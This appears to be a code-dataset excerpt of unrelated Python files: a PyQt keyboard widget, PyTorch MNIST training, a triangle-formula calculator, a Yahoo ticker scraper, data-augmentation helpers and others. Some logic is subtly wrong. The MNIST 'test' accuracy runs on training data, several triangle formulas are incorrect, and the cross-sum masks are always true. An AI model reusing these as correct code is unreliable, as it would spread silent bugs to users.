sys.path.insert(0,currentDir+"/ui")
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import ui_textInput
import myUserSetup, myUserLogin, myUserEdit, myCheckUserInfo
keyList=[\
['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.',' '] , \
['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','@','.',' '] , \
['-','_',',','$','3','#','?','!','8','%','^','=','*','+','9','0','1','4','/','5','7','~','2','>','6','<','@','.',' '] ]
class myTextInput(QWidget, ui_textInput.Ui_textInput):
def __init__(self, mainWindow, name=None, layoutSetting=None, dataStruc=None):
super(myTextInput, self).__init__()
self.setupUi(self)
self.inputedText = str()
self.shiftPressed = False
self.numLockPressed = False
self.updateKeyboardLayout()
self.btnShift.clicked.connect(lambda:self.handle_btnShift())
self.btnToggle.clicked.connect(lambda:self.handle_btnToggle())
self.btnDel.clicked.connect(lambda:self.handle_btnDel())
self.A.clicked.connect(lambda:self.handle_btn_key(0))
self.B.clicked.connect(lambda:self.handle_btn_key(1))
self.C.clicked.connect(lambda:self.handle_btn_key(2))
self.D.clicked.connect(lambda:self.handle_btn_key(3))
self.E.clicked.connect(lambda:self.handle_btn_key(4))
self.F.clicked.connect(lambda:self.handle_btn_key(5))
self.G.clicked.connect(lambda:self.handle_btn_key(6))
self.H.clicked.connect(lambda:self.handle_btn_key(7))
self.I.clicked.connect(lambda:self.handle_btn_key(8))
self.J.clicked.connect(lambda:self.handle_btn_key(9))
self.K.clicked.connect(lambda:self.handle_btn_key(10))
self.L.clicked.connect(lambda:self.handle_btn_key(11))
self.M.clicked.connect(lambda:self.handle_btn_key(12))
self.N.clicked.connect(lambda:self.handle_btn_key(13))
self.O.clicked.connect(lambda:self.handle_btn_key(14))
self.P.clicked.connect(lambda:self.handle_btn_key(15))
self.Q.clicked.connect(lambda:self.handle_btn_key(16))
self.R.clicked.connect(lambda:self.handle_btn_key(17))
self.S.clicked.connect(lambda:self.handle_btn_key(18))
self.T.clicked.connect(lambda:self.handle_btn_key(19))
self.U.clicked.connect(lambda:self.handle_btn_key(20))
self.V.clicked.connect(lambda:self.handle_btn_key(21))
self.W.clicked.connect(lambda:self.handle_btn_key(22))
self.X.clicked.connect(lambda:self.handle_btn_key(23))
self.Y.clicked.connect(lambda:self.handle_btn_key(24))
self.Z.clicked.connect(lambda:self.handle_btn_key(25))
self.btnAt.clicked.connect(lambda:self.handle_btn_key(26))
self.btnDot.clicked.connect(lambda:self.handle_btn_key(27))
self.space.clicked.connect(lambda:self.handle_btn_key(28))
if (layoutSetting == "newUser_email"):
self.lbl_title.setText("New User Setup Wizard")
self.lbl_currentText.setText("Email: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.email
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_newUser_email(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:myUserSetup.myUserSetup.newUser_gender(self,mainWindow=mainWindow,newUserInfo=dataStruc))
if (layoutSetting == "newUser_firstname"):
self.btnAt.setEnabled(False)
self.btnDot.setEnabled(False)
self.btnToggle.setEnabled(False)
self.lbl_title.setText("New User Setup Wizard")
self.lbl_currentText.setText("Firstname: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.firstname
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_newUser_firstname(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:myUserSetup.myUserSetup.newUser_email(self,mainWindow=mainWindow,newUserInfo=dataStruc))
if (layoutSetting == "newUser_lastname"):
self.btnAt.setEnabled(False)
self.btnDot.setEnabled(False)
self.btnToggle.setEnabled(False)
self.lbl_title.setText("New User Setup Wizard")
self.lbl_currentText.setText("Lastname: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.lastname
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_newUser_lastname(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:myUserSetup.myUserSetup.newUser_firstname(self,mainWindow=mainWindow,newUserInfo=dataStruc))
if (layoutSetting == "loginUser_email"):
self.lbl_title.setText("User Login")
self.lbl_currentText.setText("Email: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.email
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_loginUser_email(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:mainWindow.central_widget.removeWidget(mainWindow.central_widget.currentWidget()))
if (layoutSetting == "editUser_firstname"):
self.btnAt.setEnabled(False)
self.btnDot.setEnabled(False)
self.btnToggle.setEnabled(False)
self.lbl_title.setText("Editing user details")
self.lbl_currentText.setText("Firstname: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.firstname
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_editUser_firstname(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:myUserEdit.myUserEdit.editUser_genderUser_email(self,mainWindow=mainWindow,currentUserInfo=dataStruc))
if (layoutSetting == "editUser_lastname"):
self.btnAt.setEnabled(False)
self.btnDot.setEnabled(False)
self.btnToggle.setEnabled(False)
self.lbl_title.setText("Editing user details")
self.lbl_currentText.setText("Lastname: ")
self.btn_login.setText("Next")
self.btn_back.setText("Back")
self.inputedText = dataStruc.lastname
self.updateLineEdit()
self.btn_login.clicked.connect(lambda:self.handle_btn_login_editUser_lastname(mainWindow,dataStruc))
self.btn_back.clicked.connect(lambda:myUserEdit.myUserEdit.editUser_firstname(self,mainWindow=mainWindow,currentUserInfo=dataStruc))
def handle_btn_login_newUser_email(self, mainWindow, dataStruc):
dataStruc.email=self.inputedText
dataStruc.username=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "email")==True):
myUserSetup.myUserSetup.newUser_firstname(self,mainWindow=mainWindow,newUserInfo=dataStruc)
def handle_btn_login_newUser_firstname(self, mainWindow, dataStruc):
dataStruc.firstname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "firstname")==True):
myUserSetup.myUserSetup.newUser_lastname(self,mainWindow=mainWindow,newUserInfo=dataStruc)
def handle_btn_login_newUser_lastname(self, mainWindow, dataStruc):
dataStruc.lastname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "lastname")==True):
myUserSetup.myUserSetup.newUser_dob(self,mainWindow=mainWindow,newUserInfo=dataStruc)
def handle_btn_login_loginUser_email(self, mainWindow, dataStruc):
dataStruc.email=self.inputedText
dataStruc.username=self.inputedText
myUserLogin.myUserLogin.loginUser_passcode(self,mainWindow=mainWindow,currentUserInfo=dataStruc,newUser=True)
def handle_btn_login_editUser_firstname(self, mainWindow, dataStruc):
dataStruc.firstname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "firstname")==True):
myUserEdit.myUserEdit.editUser_lastname(self,mainWindow=mainWindow,currentUserInfo=dataStruc)
def handle_btn_login_editUser_lastname(self, mainWindow, dataStruc):
dataStruc.lastname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "lastname")==True):
myUserEdit.myUserEdit.editUser_dob(self,mainWindow=mainWindow,currentUserInfo=dataStruc)
def updateKeyboardLayout(self):
keyset = 0
if (self.shiftPressed == True): keyset = 1
if (self.numLockPressed == True): keyset = 2
self.A.setText(keyList[keyset][0])
self.B.setText(keyList[keyset][1])
self.C.setText(keyList[keyset][2])
self.D.setText(keyList[keyset][3])
self.E.setText(keyList[keyset][4])
self.F.setText(keyList[keyset][5])
self.G.setText(keyList[keyset][6])
self.H.setText(keyList[keyset][7])
self.I.setText(keyList[keyset][8])
self.J.setText(keyList[keyset][9])
self.K.setText(keyList[keyset][10])
self.L.setText(keyList[keyset][11])
self.M.setText(keyList[keyset][12])
self.N.setText(keyList[keyset][13])
self.O.setText(keyList[keyset][14])
self.P.setText(keyList[keyset][15])
self.Q.setText(keyList[keyset][16])
self.R.setText(keyList[keyset][17])
self.S.setText(keyList[keyset][18])
self.T.setText(keyList[keyset][19])
self.U.setText(keyList[keyset][20])
self.V.setText(keyList[keyset][21])
self.W.setText(keyList[keyset][22])
self.X.setText(keyList[keyset][23])
self.Y.setText(keyList[keyset][24])
self.Z.setText(keyList[keyset][25])
def updateLineEdit(self):
self.lineEdit_currentText.setText(self.inputedText)
def handle_btnDel(self):
self.inputedText = self.inputedText[:(len(self.inputedText)-1)]
self.updateLineEdit()
def handle_btn_key(self, charNum):
if (self.shiftPressed == True):
charPressed = keyList[1][charNum]
self.shiftPressed = False
self.updateKeyboardLayout()
elif (self.numLockPressed == True):
charPressed = keyList[2][charNum]
else :
charPressed = keyList[0][charNum]
self.inputedText += charPressed
self.updateLineEdit()
def handle_btnShift(self):
if (self.shiftPressed == False):
self.shiftPressed = True
self.numLockPressed = False
else:
self.shiftPressed = False
self.updateKeyboardLayout()
def handle_btnToggle(self):
if (self.numLockPressed == False):
self.numLockPressed = True
self.shiftPressed = False
else:
self.numLockPressed = False
self.updateKeyboardLayout()
def numOnlyMode(self):
self.numLockPressed = True
self.btnToggle.setEnabled(False)
self.btnShift.setEnabled(False)
self.updateKeyboardLayout()
self.A.setEnabled(False)
self.S.setEnabled(False)
self.D.setEnabled(False)
self.F.setEnabled(False)
self.G.setEnabled(False)
self.H.setEnabled(False)
self.J.setEnabled(False)
self.K.setEnabled(False)
self.L.setEnabled(False)
self.Z.setEnabled(False)
self.X.setEnabled(False)
self.C.setEnabled(False)
self.V.setEnabled(False)
self.B.setEnabled(False)
self.N.setEnabled(False)
self.M.setEnabled(False)
self.space.setEnabled(False)
self.btnAt.setEnabled(False)
|
19,718 | da5f1a6ec9b8231f61d592e9b17d2b6d7da9210c | from random import *
from math import exp
class Neuron:
def __init__(self, noInputs):
self.noInputs = noInputs
self.weights = [(random() * 2 - 1) for _ in range(self.noInputs)]
self.output = 0
self.err = 0
def activate(self, info):
# info is a list of neurons output
# Compute the new output data of the neuron
net = 0.0
for i in range(self.noInputs):
net += info[i] * self.weights[i]
# sigmoidal activation
self.output = 1 / (1.0 + exp(-net))
def setErr(self, val):
# Compute each neurons error
# sigmoidal activation
self.err = self.output * (1 - self.output) * val
|
19,719 | 6bb6d06f3985c75e2d17a67afb1630aa88c4cdb5 | ##############################################################################
#
# Copyright (C) Zenoss, Inc. 2008, all rights reserved.
#
# This content is made available according to terms specified in
# License.zenoss under the directory where your Zenoss product is installed.
#
##############################################################################
__doc__="""FalconDeviceMap
FalconDeviceMap maps the device level information for Falcon Environmental monitors.
"""
from Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap
from Products.DataCollector.plugins.DataMaps import MultiArgs
class FalconDeviceMap(SnmpPlugin):
maptype = "FalconDeviceMap"
snmpGetMap = GetMap({
'.1.3.6.1.2.1.1.2.0': 'sysObjectID',
'.1.3.6.1.4.1.3184.1.1.1.1.1.0': 'manufacturer',
'.1.3.6.1.4.1.3184.1.1.1.1.2.0': 'model',
'.1.3.6.1.4.1.3184.1.1.1.1.3.0': 'firmwareVersion',
})
def process(self, device, results, log):
log.info("processing %s for device %s", self.name(), device.id)
getdata, tabledata = results
if not getdata['sysObjectID'].startswith('.1.3.6.1.4.1.3184.1.1'):
return None
om = self.objectMap()
om.setHWProductKey = MultiArgs(getdata['model'], "RLE Technologies")
om.setOSProductKey = MultiArgs(
'Falcon OS ' + getdata['firmwareVersion'], "RLE Technologies")
return om
|
19,720 | 7f9d6609889f5e95785ee14fa7516b746ad4c41e | from django.http import HttpResponse
from django.shortcuts import render
from education.models import School
def school_list(requset):
schools = School.objects.all()
context = {
'schools':schools
}
return render(requset, 'education/school_list.html', context)
def school_detail(request, school_id):
schools = School.objects.get(id=school_id)
context = {
'schools': schools,
}
return render(request, 'education/deatil.html', context) |
19,721 | 59439691948bfe7780a45d3839bd53001a6af21c | import torch as t
import torch.nn as nn
import torchvision as tv
def load_data(batch_size=32):
transform = tv.transforms.Compose([tv.transforms.ToTensor()])
train_set = tv.datasets.MNIST(root=r'A:\DataSet\Mnist', transform=transform, train=True)
print(train_set)
train_loader = t.utils.data.DataLoader(
train_set,
batch_size=batch_size,
shuffle=True,
num_workers=4)
test_set = tv.datasets.MNIST(root=r'A:\DataSet\Mnist', transform=transform, train=False)
print(test_set)
test_loader = t.utils.data.DataLoader(
test_set,
batch_size=batch_size,
shuffle=False,
num_workers=4)
return train_loader, test_loader
class Flatten(nn.Module):
# def __init__(self):
# super(Flatten, self).__init__()
def forward(self, into):
return into.view(into.size(0), -1)
def run_model(batch_size=32, learning_rate=0.001, epochs=3):
train_loader, test_loader = load_data(batch_size)
net = nn.Sequential(
nn.Conv2d(1, 3, 3),
nn.BatchNorm2d(3),
nn.LeakyReLU(),
nn.MaxPool2d(2, 2),
nn.Conv2d(3, 5, 3),
nn.BatchNorm2d(5),
nn.LeakyReLU(),
Flatten(),
nn.Linear(5 * 11 * 11, 128),
nn.Dropout(0.2),
nn.ReLU(),
nn.Linear(128, 10),
nn.Softmax(dim=1)
)
for m in net.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
device = t.device("cuda:0" if t.cuda.is_available() else "cpu")
net.to(device)
criterion = nn.CrossEntropyLoss()
optimizer = t.optim.Adam(net.parameters(), lr=learning_rate)
for epoch in range(epochs):
net = net.train()
train_loss, train_accuracy = 0, 0
for n, (inputs, labels) in enumerate(train_loader):
inputs = inputs.to(device)
labels = labels.to(device).type(t.LongTensor)
outputs = net(inputs)
loss = criterion(outputs, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
train_loss += loss.item()
_, predict = t.max(outputs, 1)
train_accuracy += (predict == labels).sum().item() / batch_size
train_loss /= n + 1
train_accuracy /= n + 1
print(f'epoch: {epoch}, train_loss: {train_loss:.4f}, train_accuracy: {train_accuracy:.4f}')
net = net.eval()
test_accuracy = 0
for n, (inputs, labels) in enumerate(train_loader):
inputs = inputs.to(device)
labels = labels.to(device)
outputs = net(inputs)
_, predict = t.max(outputs, 1)
test_accuracy += (predict == labels).sum().item() / batch_size
test_accuracy /= n + 1
print(f'epoch: {epoch}, test_accuracy: {test_accuracy:.4f}')
if __name__ == '__main__':
BATCH_SIZE = 16
run_model()
|
19,722 | 12e7e71ce9be0a4e5f4e0a81e125accde5cd3cdf | print("\n1-tomoni, 2-ich.chz.ayl.radiusi, 3-tash.chz.ayl.radiusi, 4-Yuza")
a=int(input("Istalgan o'lchov turini tanlang: => "))
b=float(input("Endi uning qiymatini kiriting: => "))
if a==1:
print(f"Tomoni: a={b} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b*(3**(1/2))/6} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={b*(3**(1/2))/3} ga teng.")
print(f"Yuzasi: S={(b**2)*(3**(1/2))/4} ga teng.")
elif a==2:
print(f"Tomoni: a={2*(3**(1/2))*b} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={2*b} ga teng.")
print(f"Yuzasi: S={3*(3**(1/2))*b**2} ga teng.")
elif a==3:
print(f"Tomoni: a={b/(3**(1/2))} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b/2} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={b} ga teng.")
print(f"Yuzasi: S={3**(3**(1/2))/4*b**2} ga teng.")
elif a==4:
print(f"Tomoni: a={((4*b)/(3**(1/2)))**(1/2)} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={(b/(3*(3**(1/2))))} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={(4*b/(3*(3**(1/2))))} ga teng.")
print(f"Yuzasi: S={b} ga teng.")
else:
print("[1;4] oraliqda kiriting...") |
19,723 | b0020116b58da15de6283b05424655aad3d4f6d1 | import requests
import string
from time import sleep
import math
from ytd.compat import text
from ytd.compat import quote
user_agent = 'yahoo-ticker-symbol-downloader'
general_search_characters = 'abcdefghijklmnopqrstuvwxyz0123456789.='
first_search_characters = 'abcdefghijklmnopqrstuvwxyz'
class SymbolDownloader:
"""Abstract class"""
def __init__(self, type):
# All downloaded symbols are stored in a dict before exporting
# This is to ensure no duplicate data
self.symbols = {}
self.rsession = requests.Session()
self.type = type
self.queries = []
self._add_queries()
self.current_q = self.queries[0]
self.done = False
def _add_queries(self, prefix=''):
# This method will add (prefix+)a...z to self.queries
# This API requires the first character of the search to be a letter.
# The second character can be a letter, number, dot, or equals sign.
if len(prefix)==0:
search_characters = first_search_characters
else:
search_characters = general_search_characters
for i in range(len(search_characters)):
element = str(prefix) + str(search_characters[i])
if element not in self.queries: # Avoid having duplicates in list
self.queries.append(element)
def _encodeParams(self, params):
encoded = ''
for key, value in params.items():
encoded += ';' + quote(key) + '=' + quote(text(value))
return encoded
def _fetch(self, insecure):
params = {
'searchTerm': self.current_q,
}
query_string = {
'device': 'console',
'returnMeta': 'true',
}
protocol = 'http' if insecure else 'https'
req = requests.Request('GET',
protocol+'://finance.yahoo.com/_finance_doubledown/api/resource/searchassist'+self._encodeParams(params),
headers={'User-agent': user_agent},
params=query_string
)
req = req.prepare()
print("req " + req.url)
resp = self.rsession.send(req, timeout=(12, 12))
resp.raise_for_status()
return resp.json()
def decodeSymbolsContainer(self, symbolsContainer):
raise Exception("Function to extract symbols must be overwritten in subclass. Generic symbol downloader does not know how.")
def _getQueryIndex(self):
return self.queries.index(self.current_q)
def getTotalQueries(self):
return len(self.queries)
def _nextQuery(self):
if self._getQueryIndex() + 1 >= len(self.queries):
self.current_q = self.queries[0]
else:
self.current_q = self.queries[self._getQueryIndex() + 1]
def nextRequest(self, insecure=False, pandantic=False):
self._nextQuery()
success = False
retryCount = 0
json = None
# Eponential back-off algorithm
# to attempt 5 more times sleeping 5, 25, 125, 625, 3125 seconds
# respectively.
maxRetries = 5
while(success == False):
try:
json = self._fetch(insecure)
success = True
except (requests.HTTPError,
requests.exceptions.ChunkedEncodingError,
requests.exceptions.ReadTimeout,
requests.exceptions.ConnectionError) as ex:
if retryCount < maxRetries:
attempt = retryCount + 1
sleepAmt = int(math.pow(5,attempt))
print("Retry attempt: " + str(attempt) + " of " + str(maxRetries) + "."
" Sleep period: " + str(sleepAmt) + " seconds."
)
sleep(sleepAmt)
retryCount = attempt
else:
raise
(symbols, count) = self.decodeSymbolsContainer(json)
for symbol in symbols:
self.symbols[symbol.ticker] = symbol
# There is no pagination with this API.
# If we receive 10 results, we assume there are more than 10 and add another layer of queries to narrow the search further
if(count == 10):
self._add_queries(self.current_q)
elif(count > 10):
# This should never happen with this API, it always returns at most 10 items
raise Exception("Funny things are happening: count "
+ text(count)
+ " > 10. "
+ "Content:"
+ "\n"
+ repr(json))
if self._getQueryIndex() + 1 >= len(self.queries):
self.done = True
else:
self.done = False
return symbols
def isDone(self):
return self.done
def getCollectedSymbols(self):
return self.symbols.values()
def getRowHeader(self):
return ["Ticker", "Name", "Exchange"]
def printProgress(self):
if self.isDone():
print("Progress: Done!")
else:
print("Progress:"
+ " Query " + str(self._getQueryIndex()+1) + "/" + str(self.getTotalQueries()) + "."
+ "\n"
+ str(len(self.symbols)) + " unique " + self.type + " entries collected so far."
)
print ("")
|
19,724 | bc008e5cc29fdaba9d9c63e4b2ceded48cc93db5 | """DatasetInput class based on TFRecord files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tf_trainer.common import dataset_input
from tf_trainer.common import types
from typing import Callable, Dict, List
class TFRecordInput(dataset_input.DatasetInput):
"""TFRecord based DatasetInput.
Handles parsing of TF Examples.
"""
def __init__(
self,
train_path: str,
validate_path: str,
text_feature: str,
labels: Dict[str, tf.DType],
feature_preprocessor_init: Callable[[], Callable[[str], List[str]]],
batch_size: int = 64,
max_seq_length: int = 300,
round_labels: bool = True) -> None:
self._train_path = train_path
self._validate_path = validate_path
self._text_feature = text_feature
self._labels = labels
self._batch_size = batch_size
self._max_seq_length = max_seq_length
self.feature_preprocessor_init = feature_preprocessor_init
self._round_labels = round_labels
def train_input_fn(self) -> types.FeatureAndLabelTensors:
"""input_fn for TF Estimators for training set."""
return self._input_fn_from_file(self._train_path)
def validate_input_fn(self) -> types.FeatureAndLabelTensors:
"""input_fn for TF Estimators for validation set."""
return self._input_fn_from_file(self._validate_path)
def _input_fn_from_file(self, filepath: str) -> types.FeatureAndLabelTensors:
dataset = tf.data.TFRecordDataset(filepath) # type: tf.data.TFRecordDataset
# Feature preprocessor must be initialized outside of the map function
# but inside the inpout_fn function.
feature_preprocessor = self.feature_preprocessor_init()
parsed_dataset = dataset.map(
lambda x: self._read_tf_example(x, feature_preprocessor))
batched_dataset = parsed_dataset.padded_batch(
self._batch_size,
padded_shapes=(
{
# TODO: truncate to max_seq_length
self._text_feature: [None]
},
{label: [] for label in self._labels}))
# TODO: think about what happens when we run out of examples; should we be
# using something that repeats over the dataset many time to allow
# multi-epoch learning, or does estimator do this for us?
itr_op = batched_dataset.make_initializable_iterator()
# Adding the initializer operation to the graph.
tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, itr_op.initializer)
return itr_op.get_next()
def _read_tf_example(self,
record: tf.Tensor,
feature_preprocessor: Callable[[str], List[str]]
) -> types.FeatureAndLabelTensors:
"""Parses TF Example protobuf into a text feature and labels.
The input TF Example has a text feature as a singleton list with the full
comment as the single element.
"""
keys_to_features = {}
keys_to_features[self._text_feature] = tf.FixedLenFeature([], tf.string)
for label, dtype in self._labels.items():
keys_to_features[label] = tf.FixedLenFeature([], dtype)
parsed = tf.parse_single_example(
record, keys_to_features) # type: Dict[str, types.Tensor]
text = parsed[self._text_feature]
# I think this could be a feature column, but feature columns seem so beta.
preprocessed_text = feature_preprocessor(text)
features = {self._text_feature: preprocessed_text}
if self._round_labels:
labels = {label: tf.round(parsed[label]) for label in self._labels}
else:
labels = {label: parsed[label] for label in self._labels}
return features, labels
|
19,725 | 16b17def83f4b0c669bbd0f54183403f81bb4221 | #!/usr/bin/env python2.7
# coding: utf-8
import logging
import os
import sys
from logging.config import dictConfig
from multiprocessing import active_children
from time import sleep
from lib import utils
from lib.utils import (check_network_status, create_pidfile, daemonize,
load_config_from_pyfile, parse_cmd_args, spawn_workers)
from lib.worker import worker
from tests import my_mocked_method_for_test
logger = logging.getLogger('redirect_checker')
def condition_is_true():
return True
def create_workers(config, parent_pid):
required_workers_count = config.WORKER_POOL_SIZE - len(
active_children())
if required_workers_count > 0:
logger.info(
'Spawning {} workers'.format(required_workers_count))
spawn_workers(
num=required_workers_count,
target=worker,
args=(config,),
parent_pid=parent_pid
)
else:
my_mocked_method_for_test('full_pool')
def remove_workers():
logger.critical('Network is down. stopping workers')
for c in active_children():
c.terminate()
def main_loop(config):
logger.info(
u'Run main loop. Worker pool size={}. Sleep time is {}.'.format(
config.WORKER_POOL_SIZE, config.SLEEP
))
parent_pid = os.getpid()
while condition_is_true():
if check_network_status(config.CHECK_URL, config.HTTP_TIMEOUT):
create_workers(config, parent_pid)
else:
remove_workers()
sleep(config.SLEEP)
def main(argv):
args = parse_cmd_args(argv[1:])
config = utils.get_config_with_args(args)
main_loop(config)
return config.EXIT_CODE
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
19,726 | e8700b62b622bf4eb0d2f4edc3a274e9346ef6c9 | """
Cross sum
"""
import numpy as np
from .dimensionalize import dimensionalize
from .augmentor import _Augmentor
@dimensionalize
def cross_sum(X, Y=None, inds=None):
"""Sum cross given time series.
Time series will be summed with others based on the given indices. Time
points at which at least one time series of summation is anomalous will be
marked as anomalous.
Parameters
----------
X : numpy.ndarray
Time series to be augmented. Matrix with shape (n,), (N, n) or (N, n,
c), where n is the length of each series, N is the number of series,
and c is the number of channels.
Y : numpy.ndarray, optional
Binary labels of time series, where 0 represents a normal point and 1
represents an anomalous points. Matrix with shape (n,), (N, n) or (N,
n, cl), where n is the length of each series, N is the number of
series, and cl is the number of classes (i.e. types of anomaly).
Default: None.
inds : numpy.array, optional
Indices of time series to sum with. Matrix with shape (N, m), where N
is the number of series, and m is the maximal number of series to sum
with each series. The i-th output series is the sum of the i-th input
series and the ind[i][j]-th time series for all j. Values of ind[i][j]
can be NaN for series to be summed with less than m series.
Returns
-------
tuple (numpy.ndarray, numpy.ndarray)
Augmented time series and augmented labels (if argument `Y` exists).
"""
N, n, c = X.shape
if inds is None:
inds = np.zeros((N, 0))
if inds.ndim == 1:
inds = inds.reshape((N, 1))
if inds.shape[0] != N:
raise ValueError("Wrong shape of inds")
m = inds.shape[1]
X_aug = X.copy()
if Y is None:
Y_aug = None
else:
Y_aug = Y.copy()
for k in range(m):
X_aug[np.isnan(inds[:, k]) >= 0] = (
X_aug[np.isnan(inds[:, k]) >= 0]
+ X[inds[np.isnan(inds[:, k]) >= 0, k]]
)
if Y is not None:
Y_aug[np.isnan(inds[:, k]) >= 0] = (
Y_aug[np.isnan(inds[:, k]) >= 0]
+ Y[inds[np.isnan(inds[:, k]) >= 0, k]]
)
if Y is not None:
Y_aug = (Y_aug >= 1).astype(int)
return X_aug, Y_aug
@dimensionalize
def random_cross_sum(X, Y=None, max_sum_series=5, random_seed=None):
"""Sum cross given time series randomly.
Time series will be summed with others randomly. Time points at which at
least one time series of summation is anomalous will be marked as
anomalous.
Parameters
----------
X : numpy.ndarray
Time series to be augmented. Matrix with shape (n,), (N, n) or (N, n,
c), where n is the length of each series, N is the number of series,
and c is the number of channels.
Y : numpy.ndarray, optional
Binary labels of time series, where 0 represents a normal point and 1
represents an anomalous points. Matrix with shape (n,), (N, n) or (N,
n, cl), where n is the length of each series, N is the number of
series, and cl is the number of classes (i.e. types of anomaly).
Default: None.
max_sum_series : int, optinonal
Maximal number of time series to cross sum. Default: 5.
random_seed : int, optional
Random seed used to initialize the pseudo-random number generator.
Default: None.
Returns
-------
tuple (numpy.ndarray, numpy.ndarray)
Augmented time series and augmented labels (if argument `Y` exists).
"""
N, n, c = X.shape
rand = np.random.RandomState(random_seed)
inds = rand.choice(range(-1, N), size=(N, max_sum_series))
return cross_sum(X, Y, inds)
class CrossSum(_Augmentor):
"""Augmentor that sum cross given time series.
Time series will be summed with others based on the given indices. Time
points at which at least one time series of summation is anomalous will be
marked as anomalous.
Parameters
----------
inds : numpy.array, optional
Indices of time series to sum with. Matrix with shape (N, m), where N
is the number of series, and m is the maximal number of series to sum
with each series. The i-th output series is the sum of the i-th input
series and the ind[i][j]-th time series for all j. Values of ind[i][j]
can be NaN for series to be summed with less than m series.
"""
def __init__(self, inds=None):
super().__init__(augmentor_func=cross_sum, is_random=False, inds=inds)
@property
def inds(self):
return self._params["inds"]
@inds.setter
def inds(self, inds):
self._params["inds"] = inds
class RandomCrossSum(_Augmentor):
"""Augmentor that sums cross given time series randomly.
Time series will be summed with others randomly. Time points at which at
least one time series of summation is anomalous will be marked as
anomalous.
Parameters
----------
max_sum_series : int, optinonal
Maximal number of time series to cross sum. Default: 5.
random_seed : int, optional
Random seed used to initialize the pseudo-random number generator.
Default: None.
"""
def __init__(self, max_sum_series=5, random_seed=None):
super().__init__(
augmentor_func=random_cross_sum,
is_random=True,
max_sum_series=max_sum_series,
random_seed=random_seed,
)
@property
def max_sum_series(self):
return self._params["max_sum_series"]
@max_sum_series.setter
def max_sum_series(self, max_sum_series):
self._params["max_sum_series"] = max_sum_series
@property
def random_seed(self):
return self._params["random_seed"]
@random_seed.setter
def random_seed(self, random_seed):
self._params["random_seed"] = random_seed
|
19,727 | 6e2b4cd09a3a22c02ce5f8dd808cd2c1d87340be | from future import standard_library
standard_library.install_aliases()
import os
import tempfile
import urllib.request
from cumulusci.core.exceptions import CumulusCIException
from cumulusci.tasks.command import Command
class GenerateApexDocs(Command):
""" Generate Apex documentation from local code """
apexdoc_repo_url = "https://github.com/SalesforceFoundation/ApexDoc"
jar_file = "apexdoc.jar"
task_options = {
"tag": {
"description": "The tag to use for links back to the repo. If "
+ "not provided, source_url arg to ApexDoc is omitted."
},
"source_directory": {
"description": "The folder location which contains your apex "
+ ".cls classes. default=<RepoRoot>/src/classes/"
},
"out_dir": {
"description": "The folder location where documentation will be "
+ "generated to. Defaults to project config value "
+ "project/apexdoc/dir if present, otherwise uses repo root."
},
"home_page": {
"description": "The full path to an html file that contains the "
+ "contents for the home page's content area. Defaults to project "
+ "config value project/apexdoc/homepage if present, otherwise is "
+ "not used."
},
"banner_page": {
"description": "The full path to an html file that contains the "
+ "content for the banner section of each generated page. "
+ "Defaults to project config value project/apexdoc/banner if "
+ "present, otherwise is not used."
},
"scope": {
"description": "A semicolon separated list of scopes to "
+ "document. Defaults to project config value "
+ "project/apexdoc/scope if present, otherwise allows ApexDoc to "
+ "use its default (global;public;webService)."
},
"version": {
"description": "Version of ApexDoc to use. Defaults to project "
+ "config value project/apexdoc/version."
},
}
def _init_options(self, kwargs):
super(GenerateApexDocs, self)._init_options(kwargs)
self.options["command"] = None
if "source_directory" not in self.options:
self.options["source_directory"] = os.path.join(
self.project_config.repo_root, "src", "classes"
)
if "out_dir" not in self.options:
self.options["out_dir"] = (
self.project_config.project__apexdoc__dir
if self.project_config.project__apexdoc__dir
else self.project_config.repo_root
)
if "tag" not in self.options:
self.options["tag"] = None
if "home_page" not in self.options:
self.options["home_page"] = (
self.project_config.project__apexdoc__homepage
